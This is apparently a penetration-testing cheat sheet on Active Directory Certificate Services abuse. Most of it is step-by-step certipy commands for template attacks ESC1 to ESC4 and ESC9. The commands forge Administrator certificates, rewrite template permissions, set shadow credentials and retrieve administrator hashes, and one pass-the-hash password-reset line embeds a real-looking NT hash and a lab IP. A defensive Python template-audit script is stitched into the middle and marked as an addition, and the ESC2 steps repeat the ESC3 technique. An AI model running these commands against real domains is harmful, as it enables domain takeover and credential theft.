# Active Directory Certificate Services (AD CS)

#### If ports 3268 and 3269 are open, certificate templates should be checked!

## Find Vulnerable Certificates

{% code overflow="wrap" %}

```
certipy find -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -vulnerable -stdout
```

{% endcode %}

### **ESC1: Misconfigured Certificate Templates**

{% tabs %}
{% tab title="First Step" %}
{% code overflow="wrap" %}

```
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE> -upn administrator@<DOMAIN> -dns <RHOST>
```

{% endcode %}
{% endtab %}

{% tab title="Second Step" %}
{% code overflow="wrap" %}

```
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
```

{% endcode %}
{% endtab %}
{% endtabs %}

### **ESC2: Misconfigured Certificate Templates**

{% tabs %}
{% tab title="First Step" %}
{% code overflow="wrap" %}

```
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
```

{% endcode %}
{% endtab %}

{% tab title="Second Step" %}
{% code overflow="wrap" %}

```
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
```

{% endcode %}
{% endtab %}

{% tab title="Third Step" %}

```
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
```

{% endtab %}
{% endtabs %}

### **ESC3: Enrollment Agent Templates**

{% tabs %}
{% tab title="First Step" %}
{% code overflow="wrap" %}

```
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
```

{% endcode %}
{% endtab %}

{% tab title="Second Step" %}
{% code overflow="wrap" %}

```
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
```

{% endcode %}
{% endtab %}

{% tab title="Third Step" %}

```
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
```

{% endtab %}
{% endtabs %}

### **ESC4: Vulnerable Certificate Template Access Control**

{% tabs %}
{% tab title="First Step" %}
First, overwrite the template configuration to make it vulnerable to ESC1:

{% code overflow="wrap" %}

```
certipy-ad template -dc-ip <ip> -u <user> -p <pass> -template <templateName> -target <ip> -save-old
```

{% endcode %}
{% endtab %}

{% tab title="Second Step" %}
Then, request a certificate based on the ESC4 template, just like ESC1.

{% code overflow="wrap" %}

```
certipy-ad req -username <user> -password <pass> -ca <ca_name> -template <templateName> -upn Administrator@<domain> -target-ip <ip> -dns <dns_dc>
```

{% endcode %}
{% endtab %}

{% tab title="Third Step" %}
Get the hash:

```
certipy-ad auth -pfx administrator_dc01.pfx -dc-ip <ip>
```

{% endtab %}
{% endtabs %}
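As an added example that is not part of the original page or of Certipy, a small Python audit that applies the ESC1 to ESC4 template conditions the sections above target, so the templates that `certipy find -vulnerable` reports can be triaged for remediation (clear ENROLLEE_SUPPLIES_SUBJECT, require manager approval or an RA signature, or tighten enrollment and write ACLs). The flag bits and EKU OIDs are the AD schema values; the template records and principal names are constructed sample data, and the simplified `enroll`/`write` lists stand in for the template's security descriptor.

```python
# Added triage helper (not Certipy code): flags templates meeting the ESC1-ESC4
# conditions referenced above. Attribute names follow the AD pKICertificateTemplate schema.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag: caller sets SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: CA manager approval

AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
ANY_PURPOSE = "2.5.29.37.0"
CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"  # enrollment agent EKU (ESC3)
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


def audit_template(t: dict) -> list[str]:
    """Return the ESC categories one template satisfies (empty list = no finding)."""
    findings = []
    ekus = set(t["ekus"])
    low_priv_enroll = bool(LOW_PRIV & set(t["enroll"]))
    # Manager approval or a required RA signature blocks the unattended issuance ESC1-3 need.
    unattended = not (t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS) and t["ra_signatures"] == 0
    if low_priv_enroll and unattended:
        if t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and ekus & AUTH_EKUS:
            findings.append("ESC1")  # requester chooses the UPN in the SAN
        if not ekus or ANY_PURPOSE in ekus:
            findings.append("ESC2")  # no EKU restriction at all
        if CERT_REQUEST_AGENT in ekus:
            findings.append("ESC3")  # can enroll on behalf of other users
    if LOW_PRIV & set(t["write"]):
        findings.append("ESC4")  # template object itself is writable, so any of the above can be enabled
    return findings


def audit_templates(templates: list[dict]) -> dict[str, list[str]]:
    """Map template name -> findings, keeping only templates with at least one."""
    return {t["name"]: f for t in templates if (f := audit_template(t))}


# Constructed sample records (not from any real domain), one per outcome.
SAMPLE_TEMPLATES = [
    {"name": "CustomWebServer", "name_flag": 0x1, "enrollment_flag": 0x0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"], "write": ["Domain Admins"]},
    {"name": "HelpdeskAgent", "name_flag": 0x0, "enrollment_flag": 0x0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.4.1.311.20.2.1"], "enroll": ["Authenticated Users"], "write": ["Domain Admins"]},
    {"name": "LegacyMachine", "name_flag": 0x1, "enrollment_flag": 0x2, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Computers"], "write": ["Authenticated Users"]},
]
```

Running `audit_templates(SAMPLE_TEMPLATES)` yields one finding per sample template; a template that passes all checks is simply absent from the result.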

### **ESC9**

{% tabs %}
{% tab title="Step 1" %}
User1 has GenericWrite over user2, so we can obtain user2's hash using Shadow Credentials:

```
certipy shadow auto -username <user1>@<domain> -p <pass1> -account <user2>
```

We can also change the password of that user:

{% code overflow="wrap" %}

```
pth-net rpc password "ca_operator" "Password123" -U "certified.htb"/"management_svc"%"ffffffffffffffffffffffffffffffff":"a091c1832bcdd4677c28b5a6a1295584" -S "10.10.11.41" 
```

{% endcode %}
{% endtab %}

{% tab title="Step 2" %}
In this step, we change user2's userPrincipalName to Administrator:

{% code overflow="wrap" %}

```
certipy account update -username <user1>@<domain> -password <pass1> -user <user2> -upn Administrator
```

{% endcode %}
{% endtab %}

{% tab title="Step 3" %}
We request a certificate from the vulnerable ESC9 template as user2:

{% code overflow="wrap" %}

```
certipy req -username <user2>@<domain> -hashes <user2_hash> -ca <ca_name> -template <vulnerable_ESC9_template>
```

{% endcode %}
{% endtab %}

{% tab title="Step 4" %}
And finally, we get the Administrator hash:

```
certipy auth -pfx administrator.pfx -domain <domain>
```
```

{% endtab %}
{% endtabs %}
